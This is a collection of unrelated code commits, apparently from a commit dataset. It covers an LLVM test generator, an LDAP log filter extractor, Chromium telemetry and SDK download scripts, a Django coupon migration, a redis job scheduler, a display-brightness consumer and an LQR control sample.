BUNDLE_SIZE = 2 ** BUNDLE_SIZE_POW2
PREAMBLE = '''
# RUN: llvm-mc -filetype=obj -triple i386-pc-linux-gnu %s -o - \\
# RUN: | llvm-objdump -triple i386 -disassemble -no-show-raw-insn - | FileCheck %s
# !!! This test is auto-generated from utils/testgen/mc-bundling-x86-gen.py !!!
# It tests that bundle-aligned grouping works correctly in MC. Read the
# source of the script for more details.
.text
.bundle_align_mode {0}
'''.format(BUNDLE_SIZE_POW2).lstrip()
ALIGNTO = ' .align {0}, 0x90'
NOPFILL = ' .fill {0}, 1, 0x90'
def print_bundle_locked_sequence(count):
  """Emit a bundle-locked group of *count* one-byte 'inc %eax' instructions.

  The parameter was originally named 'len', shadowing the builtin; renamed
  (the only caller passes it positionally).
  """
  print('  .bundle_lock')
  print('  .rept {0}'.format(count))
  print('    inc %eax')
  print('  .endr')
  print('  .bundle_unlock')
def generate():
  """Emit the whole .s test: for every (instruction-count, offset) pair,
  a labeled, NOP-offset, bundle-locked group plus FileCheck lines that
  assert where the first 'incl' lands after bundle padding."""
  print(PREAMBLE)
  ntest = 0
  for instlen in range(1, BUNDLE_SIZE + 1):
    for offset in range(0, BUNDLE_SIZE):
      # Spread out all the instructions to not worry about cross-bundle
      # interference.
      print(ALIGNTO.format(2 * BUNDLE_SIZE))
      print('INSTRLEN_{0}_OFFSET_{1}:'.format(instlen, offset))
      if offset > 0:
        print(NOPFILL.format(offset))
      print_bundle_locked_sequence(instlen)
      # Now generate an appropriate CHECK line
      base_offset = ntest * 2 * BUNDLE_SIZE
      inst_orig_offset = base_offset + offset  # had it not been padded...
      if offset + instlen > BUNDLE_SIZE:
        # Padding needed
        print('# CHECK: {0:x}: nop'.format(inst_orig_offset))
        # round (offset + length) up to the next bundle boundary
        aligned_offset = (inst_orig_offset + instlen) & ~(BUNDLE_SIZE - 1)
        print('# CHECK: {0:x}: incl'.format(aligned_offset))
      else:
        # No padding needed
        print('# CHECK: {0:x}: incl'.format(inst_orig_offset))
      print()
      ntest += 1
# Write the generated test to stdout when run as a script.
if __name__ == '__main__':
  generate()
| Python | 0.000021 | |
15150516e1915948b10abed70e964a5b6109013b | Add ExtractAttribute | tohu/derived_generators_NEW.py | tohu/derived_generators_NEW.py | import logging
from operator import attrgetter
from .base_NEW import TohuUltraBaseGenerator
__all__ = ['ExtractAttribute']
logger = logging.getLogger('tohu')
class ExtractAttribute(TohuUltraBaseGenerator):
    """
    Generator which produces items that are attributes extracted from
    the items produced by a different generator.
    """
    def __init__(self, g, attr_name):
        logger.debug(f"Extracting attribute '{attr_name}' from parent={g}")
        # Keep a reference to the parent but iterate a clone -- presumably
        # so that consuming this generator does not advance the parent.
        self.parent = g
        self.gen = g.clone()
        self.attr_name = attr_name
        # operator.attrgetter also accepts dotted names, so nested
        # attributes work too.
        self.attrgetter = attrgetter(attr_name)
    def __repr__(self):
        return f"<ExtractAttribute '{self.attr_name}' from {self.parent} >"
    def spawn(self, dependency_mapping):
        # Spawning is not implemented yet; the warning records the mapping
        # that would have been needed.
        logger.warning(f'ExtractAttribute.spawn(): dependency_mapping={dependency_mapping}')
        raise NotImplementedError()
    def __next__(self):
        return self.attrgetter(next(self.gen))
| Python | 0.000001 | |
c9afc35d2be96adea47e79a4c0042235e4ffd594 | add ldap-filter-cut.py | python/python/openldap/ldap-filter-cut.py | python/python/openldap/ldap-filter-cut.py | #!/usr/bin/env python
'''
Copyright (C) 2011 Bryan Maupin <bmaupincode@gmail.com>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
'''
Takes an OpenLDAP log file, cuts the filters out of it, and writes the unique
filters to a new file.
'''
import re
import sys
def main():
filters = []
pattern = re.compile('filter="(.*)"')
# the input file is the first argument to this script
infile_name = sys.argv[1]
infile = open(infile_name)
for line in infile:
match = pattern.search(line)
if match:
filter = match.group(1)
if filter not in filters:
filters.append(filter)
infile.close()
print '%s filters found' % (len(filters))
# the output file is the second argument to this script
outfile_name = sys.argv[2]
outfile = open(outfile_name, 'w')
for filter in filters:
outfile.write('%s\n' % (filter))
outfile.close()
# calls the main() function when the script runs (but not when imported)
if __name__ == '__main__':
    main()
| Python | 0.000001 | |
3a19187e8116e8dc20166786fb1ca4d14b527950 | Add missing IDL Visistor class | ppapi/generators/idl_visitor.py | ppapi/generators/idl_visitor.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Visitor Object for traversing AST """
#
# IDLVisitor
#
# The IDLVisitor class will traverse an AST truncating portions of the tree
# that fail due to class or version filters. For each node, after the filter
# passes, the visitor will call the 'Arive' member passing in the node and
# and data passing in from the parent call. It will then Visit the children.
# When done processing children, the visitor will call the 'Depart' member
# before returning
#
class IDLVisitor(object):
  """Base AST visitor; subclasses customize VisitFilter, AgrigateFilter,
  Arrive and Depart. self.depth tracks the current traversal depth."""
  def __init__(self):
    self.depth = 0

  # Return TRUE if the node should be visited
  def VisitFilter(self, node, data):
    return True

  # Return TRUE if data should be added to the childdata list
  # (the misspelling of "Aggregate" is kept: subclasses override this name)
  def AgrigateFilter(self, data):
    return data is not None

  def Visit(self, node, data):
    self.depth += 1
    if not self.VisitFilter(node, data):
      # Rebalance before the early return: the original skipped this
      # decrement, permanently skewing self.depth after any filtered node.
      self.depth -= 1
      return None
    childdata = []
    newdata = self.Arrive(node, data)
    for child in node.GetChildren():
      ret = self.Visit(child, newdata)
      if self.AgrigateFilter(ret):
        childdata.append(ret)
    out = self.Depart(node, newdata, childdata)
    self.depth -= 1
    return out

  def Arrive(self, node, data):
    return data

  def Depart(self, node, data, childdata):
    return data
#
# IDLVersionVisitor
#
# The IDLVersionVisitor will only visit nodes with intervals that include the
# version. It will also optionally filter based on a class list
#
class IDLVersionVisitor(object):
  """Filters nodes to those matching a version, optionally restricted to a
  list of node classes."""
  def __init__(self, version, classList):
    self.version = version
    # Store under the name Filter() reads; the original assigned the
    # undefined name 'classes' (NameError on construction).
    self.classList = classList

  def Filter(self, node, data):
    if self.classList and node.cls not in self.classList: return False
    if not node.IsVersion(self.version): return False
    return True
class IDLRangeVisitor(object):
  # Filters nodes to a [vmin, vmax] version range, optionally restricted
  # to a list of node classes.
  def __init__(self, vmin, vmax, classList):
    self.vmin = vmin
    self.vmax = vmax
    self.classList = classList
  def Filter(self, node, data):
    if self.classList and node.cls not in self.classList: return False
    # NOTE(review): self.version is never assigned on this class (only
    # vmin/vmax are), so this line raises AttributeError; presumably the
    # intent was a vmin..vmax range check -- confirm before use.
    if not node.IsVersion(self.version): return False
    return True
| Python | 0.999835 | |
bbed7b813b6c809ee9615eabf2fcf4d3156b1c36 | Add script to convert release notes from Markdown | tools/convert_release_notes.py | tools/convert_release_notes.py | import sys
import mistune
# Path of the Markdown release notes is the first CLI argument.
print(sys.argv[1])
with open(sys.argv[1], "r") as source_file:
    source = source_file.read()
# First pass: render the notes with mistune's default (HTML) renderer.
html = mistune.Markdown()
print()
print("HTML")
print("=====================================")
print("From the <a href=\"\">GitHub release page</a>:\n<blockquote>")
print(html(source))
print("</blockquote>")
class AdafruitBBCodeRenderer:
    """Mistune renderer that emits forum BBCode instead of HTML."""

    def __init__(self, **kwargs):
        self.options = kwargs

    def placeholder(self):
        """Initial value mistune accumulates rendered output onto."""
        return ''

    def paragraph(self, text):
        return text + "\n\n"

    def text(self, text):
        return text

    def link(self, link, title, text):
        return "[url=" + link + "]" + text + "[/url]"

    def header(self, text, level, raw):
        return "[b][size=150]" + text + "[/size][/b]\n"

    def codespan(self, text):
        return "[color=#E74C3C][size=95]" + text + "[/size][/color]"

    def list_item(self, text):
        return "[*]" + text.strip() + "[/*]\n"

    def list(self, body, ordered=True):
        marker = "=" if ordered else ""
        return "[list" + marker + "]\n" + body + "[/list]"

    def double_emphasis(self, text):
        return "[b]" + text + "[/b]"
# Second pass: render the same source as forum BBCode.
bbcode = mistune.Markdown(renderer=AdafruitBBCodeRenderer())
print()
print("BBCode")
print("=====================================")
print("From the [url=]GitHub release page[/url]:\n[quote]")
print(bbcode(source))
print("[/quote]")
| Python | 0 | |
c16c04bde2ace97a2eec000c87e23cfc27bfd7ec | Print trace counters with trace events. | tools/perf/metrics/timeline.py | tools/perf/metrics/timeline.py | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
from metrics import Metric
from telemetry.page import page_measurement
TRACING_MODE = 'tracing-mode'
TIMELINE_MODE = 'timeline-mode'
class TimelineMetric(Metric):
  """Captures a browser trace or a DevTools timeline for a page and reports
  per-event-name total/max/avg times (plus, in tracing mode, thread
  counter totals)."""
  def __init__(self, mode):
    # mode picks the capture mechanism: browser-wide tracing or the
    # per-tab DevTools timeline.
    assert mode in (TRACING_MODE, TIMELINE_MODE)
    super(TimelineMetric, self).__init__()
    self._mode = mode
    self._model = None          # timeline model, built in Stop()
    self._thread_for_tab = None # thread whose slices AddResults reads
  def Start(self, page, tab):
    # Reset state left over from a previous page before recording.
    self._model = None
    self._thread_for_tab = None
    if self._mode == TRACING_MODE:
      if not tab.browser.supports_tracing:
        raise Exception('Not supported')
      tab.browser.StartTracing()
    else:
      assert self._mode == TIMELINE_MODE
      tab.StartTimelineRecording()
  def Stop(self, page, tab):
    # Stop recording and locate the tab's thread in the captured model.
    if self._mode == TRACING_MODE:
      # This creates an async trace event in the render process for tab that
      # will allow us to find that tab during the AddTracingResultsForTab
      # function.
      success = tab.EvaluateJavaScript("""
          console.time("__loading_measurement_was_here__");
          console.timeEnd("__loading_measurement_was_here__");
          console.time.toString().indexOf('[native code]') != -1;
          """)
      trace_result = tab.browser.StopTracing()
      if not success:
        raise page_measurement.MeasurementFailure(
            'Page stomped on console.time')
      self._model = trace_result.AsTimelineModel()
      # Only the top-level marker counts (no parent slice).
      # NOTE(review): '== None' here would be 'is None' per PEP 8.
      events = [s for
                s in self._model.GetAllEventsOfName(
                    '__loading_measurement_was_here__')
                if s.parent_slice == None]
      assert len(events) == 1, 'Expected one marker, got %d' % len(events)
      # TODO(tonyg): This should be threads_for_tab and report events for both
      # the starting thread and ending thread.
      self._thread_for_tab = events[0].start_thread
    else:
      tab.StopTimelineRecording()
      self._model = tab.timeline_model
      self._thread_for_tab = self._model.GetAllThreads()[0]
  def AddResults(self, tab, results):
    # Report ms total/max/avg per slice name, then counter totals/avg.
    assert self._model
    events = self._thread_for_tab.all_slices
    events_by_name = collections.defaultdict(list)
    for e in events:
      events_by_name[e.name].append(e)
    for event_name, event_group in events_by_name.iteritems():
      times = [event.self_time for event in event_group]
      total = sum(times)
      biggest_jank = max(times)
      results.Add(event_name, 'ms', total)
      results.Add(event_name + '_max', 'ms', biggest_jank)
      results.Add(event_name + '_avg', 'ms', total / len(times))
    counters_by_name = self._thread_for_tab.parent.counters
    for counter_name, counter in counters_by_name.iteritems():
      total = sum(counter.totals)
      results.Add(counter_name, 'count', total)
      results.Add(counter_name + '_avg', 'count', total / len(counter.totals))
| # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
from metrics import Metric
from telemetry.page import page_measurement
TRACING_MODE = 'tracing-mode'
TIMELINE_MODE = 'timeline-mode'
class TimelineMetric(Metric):
  """Captures a browser trace or a DevTools timeline for a page and reports
  per-event-name total/max/avg times."""
  def __init__(self, mode):
    # mode picks the capture mechanism: browser-wide tracing or the
    # per-tab DevTools timeline.
    assert mode in (TRACING_MODE, TIMELINE_MODE)
    super(TimelineMetric, self).__init__()
    self._mode = mode
    self._model = None          # timeline model, built in Stop()
    self._thread_for_tab = None # thread whose slices AddResults reads
  def Start(self, page, tab):
    # Reset state left over from a previous page before recording.
    self._model = None
    self._thread_for_tab = None
    if self._mode == TRACING_MODE:
      if not tab.browser.supports_tracing:
        raise Exception('Not supported')
      tab.browser.StartTracing()
    else:
      assert self._mode == TIMELINE_MODE
      tab.StartTimelineRecording()
  def Stop(self, page, tab):
    # Stop recording and locate the tab's thread in the captured model.
    if self._mode == TRACING_MODE:
      # This creates an async trace event in the render process for tab that
      # will allow us to find that tab during the AddTracingResultsForTab
      # function.
      success = tab.EvaluateJavaScript("""
          console.time("__loading_measurement_was_here__");
          console.timeEnd("__loading_measurement_was_here__");
          console.time.toString().indexOf('[native code]') != -1;
          """)
      trace_result = tab.browser.StopTracing()
      if not success:
        raise page_measurement.MeasurementFailure(
            'Page stomped on console.time')
      self._model = trace_result.AsTimelineModel()
      # Only the top-level marker counts (no parent slice).
      # NOTE(review): '== None' here would be 'is None' per PEP 8.
      events = [s for
                s in self._model.GetAllEventsOfName(
                    '__loading_measurement_was_here__')
                if s.parent_slice == None]
      assert len(events) == 1, 'Expected one marker, got %d' % len(events)
      # TODO(tonyg): This should be threads_for_tab and report events for both
      # the starting thread and ending thread.
      self._thread_for_tab = events[0].start_thread
    else:
      tab.StopTimelineRecording()
      self._model = tab.timeline_model
      self._thread_for_tab = self._model.GetAllThreads()[0]
  def AddResults(self, tab, results):
    # Report ms total/max/avg per slice name.
    assert self._model
    events = self._thread_for_tab.all_slices
    events_by_name = collections.defaultdict(list)
    for e in events:
      events_by_name[e.name].append(e)
    for event_name, event_group in events_by_name.iteritems():
      times = [event.self_time for event in event_group]
      total = sum(times)
      biggest_jank = max(times)
      results.Add(event_name, 'ms', total)
      results.Add(event_name + '_max', 'ms', biggest_jank)
      results.Add(event_name + '_avg', 'ms', total / len(times))
| Python | 0.000002 |
1db5cd0fddbbcc1d38a08bfe8ad6cfb8d0b5c550 | add migration to create new model fields | coupons/migrations/0004_auto_20151105_1456.py | coupons/migrations/0004_auto_20151105_1456.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
class Migration(migrations.Migration):
    """Add CouponUser, Coupon.user_limit and a 'virtual_currency' coupon type."""
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('coupons', '0003_auto_20150416_0617'),
    ]
    operations = [
        # New join model recording when (if ever) a user redeemed a coupon.
        migrations.CreateModel(
            name='CouponUser',
            fields=[
                ('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),
                ('redeemed_at', models.DateTimeField(blank=True, verbose_name='Redeemed at', null=True)),
            ],
        ),
        # How many users may redeem a single coupon (default: one).
        migrations.AddField(
            model_name='coupon',
            name='user_limit',
            field=models.PositiveIntegerField(verbose_name='User limit', default=1),
        ),
        # Extend the coupon type choices with 'virtual_currency'.
        migrations.AlterField(
            model_name='coupon',
            name='type',
            field=models.CharField(choices=[('monetary', 'Money based coupon'), ('percentage', 'Percentage discount'), ('virtual_currency', 'Virtual currency')], verbose_name='Type', max_length=20),
        ),
        # Link each CouponUser row to its coupon and (optionally) a user.
        migrations.AddField(
            model_name='couponuser',
            name='coupon',
            field=models.ForeignKey(related_name='users', to='coupons.Coupon'),
        ),
        migrations.AddField(
            model_name='couponuser',
            name='user',
            field=models.ForeignKey(null=True, to=settings.AUTH_USER_MODEL, blank=True, verbose_name='User'),
        ),
    ]
| Python | 0 | |
3bd7c50acfc8044fc33002530a5fcaa0b5c2152e | add module 'job' for reset queue | libs/qpanel/job.py | libs/qpanel/job.py | import backend
import config
from redis import Redis
from rq_scheduler import Scheduler
import datetime
def reset_stats_queue(queuename, when, hour):
    '''
    Reset the backend statistics for *queuename*.

    *when* and *hour* identify the scheduled job that triggered this call;
    the reset only proceeds while a matching job is still scheduled (see
    exists_job_onqueue). Returns False when no matching job exists,
    otherwise the backend's reset result.
    '''
    remove_jobs_not_config()
    if not exists_job_onqueue(queuename, when, hour):
        return False
    return backend.Backend().reset_stats(queuename)
def job_reset_stats_queue(queuename, when, hour):
    '''
    Schedule a recurring reset_stats_queue job for *queuename*, unless an
    identical job is already on the queue.
    '''
    scheduler = Scheduler(connection=Redis())
    remove_jobs_not_config()
    if exists_job_onqueue(queuename, when, hour):
        return
    scheduler.schedule(
        scheduled_time=datetime_from_config(when, hour),
        func=reset_stats_queue,
        args=[queuename, when, hour],
        interval=seconds_from_config_interval(when)
    )
def exists_job_onqueue(queuename, when, hour):
    """
    Return True if a reset_stats_queue job with exactly these
    (queuename, when, hour) arguments is currently scheduled.
    """
    scheduler = Scheduler(connection=Redis())
    for job in scheduler.get_jobs():
        if 'reset_stats_queue' not in job.func_name:
            continue
        if job.args[0] == queuename and job.args[1] == when and job.args[2] == hour:
            return True
    return False
def remove_jobs_not_config():
    """
    Delete scheduled reset jobs whose queue is no longer configured.

    Guards against stale jobs left behind after the QPanel configuration
    is edited or a queue entry is removed.
    """
    scheduler = Scheduler(connection=Redis())
    configured = config.QPanelConfig().queues_for_reset_stats()
    for job in scheduler.get_jobs():
        if 'reset_stats_queue' in job.func_name and job.args[0] not in configured:
            job.delete()
def enqueue_reset_stats():
    """Schedule a stats-reset job for every queue configured for resets."""
    for queue_name, params in config.QPanelConfig().queues_for_reset_stats().items():
        job_reset_stats_queue(queue_name, params['when'], params['hour'])
def seconds_from_config_interval(val):
    """
    Return the job repeat interval in seconds for a config value.

    'daily' -> 1 day; 'weekly' or a weekday abbreviation -> 7 days;
    'monthly' -> 30 days; anything else -> 0. Matching is case-insensitive.
    """
    val = val.lower()
    day = 0
    if val == 'daily':
        day = 1
    # BUG FIX: the original list was missing a comma between 'fri' and 'sat',
    # so Python concatenated them into 'frisat' and neither day ever matched.
    elif val in ('weekly', 'sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat'):
        day = 7
    elif val == 'monthly':
        day = 30
    return day * 24 * 60 * 60  # day * hour * minute * seconds
def datetime_from_config(when, hour):
    # NOTE(review): *when* and *hour* are currently ignored -- the first run is
    # scheduled for "now" (UTC) and recurrence relies solely on the `interval`
    # passed to scheduler.schedule(). TODO confirm whether the first run should
    # instead be aligned to `hour`.
    return datetime.datetime.utcnow()
| Python | 0.000001 | |
b0c3ed39916e25bed2900b653974672a39fcb254 | Use CHROME_HEADLESS to check if download_sdk_extras.py is running on a bot. | build/download_sdk_extras.py | build/download_sdk_extras.py | #!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Script to download sdk/extras packages on the bots from google storage.
The script expects arguments that specify zips file in the google storage
bucket named: <dir in SDK extras>_<package name>_<version>.zip. The file will
be extracted in the android_tools/sdk/extras directory on the test bots. This
script will not do anything for developers.
"""
import json
import os
import shutil
import subprocess
import sys
import zipfile
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
CHROME_SRC = os.path.abspath(os.path.join(SCRIPT_DIR, os.pardir))
sys.path.insert(0, os.path.join(SCRIPT_DIR, 'android'))
sys.path.insert(1, os.path.join(CHROME_SRC, 'tools'))
from pylib import constants
import find_depot_tools
DEPOT_PATH = find_depot_tools.add_depot_tools_to_path()
GSUTIL_PATH = os.path.join(DEPOT_PATH, 'gsutil.py')
SDK_EXTRAS_BUCKET = 'gs://chrome-sdk-extras'
SDK_EXTRAS_PATH = os.path.join(constants.ANDROID_SDK_ROOT, 'extras')
SDK_EXTRAS_JSON_FILE = os.path.join(os.path.dirname(__file__),
'android_sdk_extras.json')
def clean_and_extract(dir_name, package_name, zip_file):
  """Delete any previous extraction of the package, then unzip it fresh."""
  target_dir = '%s/%s/%s' % (SDK_EXTRAS_PATH, dir_name, package_name)
  if os.path.exists(target_dir):
    shutil.rmtree(target_dir)
  archive_path = '%s/%s' % (SDK_EXTRAS_PATH, zip_file)
  with zipfile.ZipFile(archive_path) as archive:
    archive.extractall(path=SDK_EXTRAS_PATH)
def main():
  """Download (if needed) and extract each SDK extras package on bots.

  Reads the package list from android_sdk_extras.json; does nothing for
  developer checkouts (CHROME_HEADLESS unset).
  """
  if not os.environ.get('CHROME_HEADLESS'):
    # Not running on a buildbot, so there is nothing to download.
    return 0
  with open(SDK_EXTRAS_JSON_FILE) as json_file:
    packages = json.load(json_file)
  for package in packages:
    local_zip = '%s/%s' % (SDK_EXTRAS_PATH, package['zip'])
    if not os.path.exists(local_zip):
      remote_zip = '%s/%s' % (SDK_EXTRAS_BUCKET, package['zip'])
      subprocess.check_call(['python', GSUTIL_PATH, '--force-version', '4.7',
                             'cp', remote_zip, local_zip])
    # Extract unconditionally so stale contents are always replaced.
    clean_and_extract(package['dir_name'], package['package'], package['zip'])
if __name__ == '__main__':
  sys.exit(main())
| #!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Script to download sdk/extras packages on the bots from google storage.
The script expects arguments that specify zips file in the google storage
bucket named: <dir in SDK extras>_<package name>_<version>.zip. The file will
be extracted in the android_tools/sdk/extras directory.
"""
import json
import os
import shutil
import subprocess
import sys
import zipfile
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'android'))
from pylib import constants
GSUTIL_PATH = os.path.join(os.path.dirname(__file__), os.pardir, os.pardir,
os.pardir, os.pardir, os.pardir, os.pardir, 'depot_tools', 'gsutil.py')
SDK_EXTRAS_BUCKET = 'gs://chrome-sdk-extras'
SDK_EXTRAS_PATH = os.path.join(constants.ANDROID_SDK_ROOT, 'extras')
SDK_EXTRAS_JSON_FILE = os.path.join(os.path.dirname(__file__),
'android_sdk_extras.json')
def clean_and_extract(dir_name, package_name, zip_file):
  """Remove any previously extracted copy of the package, then unzip it."""
  local_dir = '%s/%s/%s' % (SDK_EXTRAS_PATH, dir_name, package_name)
  if os.path.exists(local_dir):
    shutil.rmtree(local_dir)
  local_zip = '%s/%s' % (SDK_EXTRAS_PATH, zip_file)
  with zipfile.ZipFile(local_zip) as z:
    z.extractall(path=SDK_EXTRAS_PATH)
def main():
  """Download missing SDK extras zips from google storage and extract them.

  Returns 0 without doing anything when gsutil or the SDK extras directory
  is absent, i.e. this is not a buildbot checkout.
  """
  if not os.path.exists(GSUTIL_PATH) or not os.path.exists(SDK_EXTRAS_PATH):
    # This is not a buildbot checkout.
    return 0
  # Update the android_sdk_extras.json file to update downloaded packages.
  with open(SDK_EXTRAS_JSON_FILE) as json_file:
    packages = json.load(json_file)
  for package in packages:
    local_zip = '%s/%s' % (SDK_EXTRAS_PATH, package['zip'])
    if not os.path.exists(local_zip):
      package_zip = '%s/%s' % (SDK_EXTRAS_BUCKET, package['zip'])
      subprocess.check_call([GSUTIL_PATH, '--force-version', '4.7', 'cp',
                             package_zip, local_zip])
    # Always clean dir and extract zip to ensure correct contents.
    clean_and_extract(package['dir_name'], package['package'], package['zip'])
if __name__ == '__main__':
  sys.exit(main())
| Python | 0 |
80580b8667558e3a4034b31ac08773de70ef3b39 | Implement consumer for adjusting screen brightness. | display_control_consumer/run.py | display_control_consumer/run.py | from setproctitle import setproctitle
import json
import redis
import subprocess
import time
class DisplayControlConsumer(object):
    """Walks the X display brightness towards a redis-requested target.

    Once per second the run() loop reads the destination brightness from
    redis and nudges the actual xrandr brightness towards it in STEP-sized
    increments, broadcasting each applied change.
    """
    # Brightness change applied per one-second iteration of run().
    STEP = 0.05
    def __init__(self):
        self.redis_instance = redis.StrictRedis()
        self.env = {"DISPLAY": ":0"}
    def get_brightness(self):
        """Parse the current brightness from `xrandr --verbose` output.

        Returns None if no "Brightness" line is present in the output.
        """
        p = subprocess.Popen(["xrandr", "--verbose"], env=self.env, stdout=subprocess.PIPE)
        (stdout, _) = p.communicate()
        for line in stdout.split("\n"):
            if "Brightness" in line:
                return float(line.strip().split(": ")[1])
    def set_brightness(self, brightness):
        """Apply *brightness* via xrandr and cache it in redis for 60s."""
        # NOTE(review): the output name "HDMI-0" is hard-coded -- confirm it
        # matches the deployment's actual display output.
        p = subprocess.Popen(["xrandr", "--q1", "--output", "HDMI-0", "--brightness", unicode(brightness)], env=self.env)
        p.wait()
        self.redis_instance.setex("display-control-brightness", 60, brightness)
    def run(self):
        """Main loop: step brightness towards the requested destination.

        The destination key is deleted once reached or overshot, which stops
        further adjustment until a new destination is published.
        """
        while True:
            time.sleep(1)
            destination_brightness = self.redis_instance.get("display-control-destination-brightness")
            if not destination_brightness:
                continue
            destination_brightness = float(destination_brightness)
            current_brightness = self.redis_instance.get("display-control-brightness")
            if current_brightness:
                current_brightness = float(current_brightness)
            else:
                # Cache miss: query xrandr directly and refresh the cache.
                current_brightness = self.get_brightness()
                self.redis_instance.setex("display-control-brightness", 60, current_brightness)
            if current_brightness > destination_brightness:
                # Decrease brightness. Current brightness is too large.
                new_brightness = current_brightness - self.STEP
                print "Decreasing brightness: %s (-> %s, currently at %s)" % (new_brightness, destination_brightness, current_brightness)
                if new_brightness < destination_brightness:
                    # Wrapped around: new brightness is smaller than destination brightness.; no action
                    print "Brightness wrapped around"
                    self.redis_instance.delete("display-control-destination-brightness")
                    continue
            elif current_brightness < destination_brightness:
                # Increase brightness
                new_brightness = current_brightness + self.STEP
                print "Increasing brightness: %s (-> %s, currently at %s)" % (new_brightness, destination_brightness, current_brightness)
                if new_brightness > destination_brightness:
                    # Wrapped around; no action
                    self.redis_instance.delete("display-control-destination-brightness")
                    continue
            else:
                # Already matches. No action.
                self.redis_instance.delete("display-control-destination-brightness")
                continue
            print "Setting brightness to %s (destination: %s)" % (new_brightness, destination_brightness)
            self.set_brightness(new_brightness)
            self.redis_instance.publish("home:broadcast:generic", json.dumps({"key": "display_brightness", "content": new_brightness}))
def main():
    """Entry point: set the process title and run the consumer loop forever."""
    setproctitle("display_control_consumer: run")
    DisplayControlConsumer().run()
if __name__ == '__main__':
    main()
| Python | 0 | |
5a376ef0d49193df46fc127323bfa50376e3c968 | add lqr sample | lqr_sample/main.py | lqr_sample/main.py | #! /usr/bin/python
# -*- coding: utf-8 -*-
u"""
Linear-Quadratic Regulator sample code
author Atsushi Sakai
"""
import matplotlib.pyplot as plt
import numpy as np
import scipy.linalg as la
simTime=3.0
dt=0.1
A=np.matrix([[1.1,2.0],[0,0.95]])
B=np.matrix([0.0,0.0787]).T
C=np.matrix([-2,1])
def Observation(x):
    u"""Return the scalar measurement y = C * x for state vector *x*."""
    measurement = C * x
    return float(measurement[0])
def Process(x, u):
    u"""Advance the plant one discrete step: x' = A x + B u."""
    return A * x + B * u
def dlqr(A, B, Q, R):
    """Solve the discrete time lqr controller.
    x[k+1] = A x[k] + B u[k]
    cost = sum x[k].T*Q*x[k] + u[k].T*R*u[k]
    Returns (K, X, eigVals): the gain, the Riccati solution and the
    closed-loop eigenvalues.  (ref Bertsekas, p.151)
    """
    # Solve the discrete-time algebraic Riccati equation for the cost-to-go.
    riccati = np.matrix(la.solve_discrete_are(A, B, Q, R))
    # Feedback gain: K = (R + B' X B)^-1 (B' X A).
    gain = np.matrix(la.inv(B.T * riccati * B + R) * (B.T * riccati * A))
    closed_loop_eigs, _ = la.eig(A - B * gain)
    return gain, riccati, closed_loop_eigs
def LQRController(x, u):
    u"""Return the LQR state-feedback input -K x (the *u* argument is unused)."""
    gain, _, _ = dlqr(A, B, C.T * np.eye(1) * C, np.eye(1))
    return -gain * x
def Main():
    u"""Simulate the closed loop and plot the input/output histories."""
    x = np.matrix([3, 1]).T      # initial state
    u = np.matrix([0, 0, 0])     # placeholder; overwritten on first iteration
    t = 0.0
    u_hist = []
    y_hist = []
    t_hist = []
    while t <= simTime:
        u = LQRController(x, u)
        u0 = float(u[0, 0])
        x = Process(x, u0)
        u_hist.append(u0)
        y_hist.append(Observation(x))
        t_hist.append(t)
        t += dt
    plt.plot(t_hist, u_hist, "-r", label="input")
    plt.plot(t_hist, y_hist, "-b", label="output")
    plt.grid(True)
    plt.xlim([0, simTime])
    plt.legend()
    plt.show()
if __name__ == '__main__':
    Main()
| Python | 0 | |
e0b6db29ed260f4b54298c4d079f7fc6ce98a591 | Split out public room list into a worker process | synapse/app/client_reader.py | synapse/app/client_reader.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import synapse
from synapse.config._base import ConfigError
from synapse.config.homeserver import HomeServerConfig
from synapse.config.logger import setup_logging
from synapse.http.site import SynapseSite
from synapse.http.server import JsonResource
from synapse.metrics.resource import MetricsResource, METRICS_PREFIX
from synapse.replication.slave.storage._base import BaseSlavedStore
from synapse.replication.slave.storage.appservice import SlavedApplicationServiceStore
from synapse.replication.slave.storage.events import SlavedEventStore
from synapse.replication.slave.storage.keys import SlavedKeyStore
from synapse.replication.slave.storage.room import RoomStore
from synapse.replication.slave.storage.directory import DirectoryStore
from synapse.replication.slave.storage.registration import SlavedRegistrationStore
from synapse.rest.client.v1.room import PublicRoomListRestServlet
from synapse.server import HomeServer
from synapse.storage.client_ips import ClientIpStore
from synapse.storage.engines import create_engine
from synapse.util.async import sleep
from synapse.util.httpresourcetree import create_resource_tree
from synapse.util.logcontext import LoggingContext
from synapse.util.manhole import manhole
from synapse.util.rlimit import change_resource_limit
from synapse.util.versionstring import get_version_string
from synapse.crypto import context_factory
from twisted.internet import reactor, defer
from twisted.web.resource import Resource
from daemonize import Daemonize
import sys
import logging
import gc
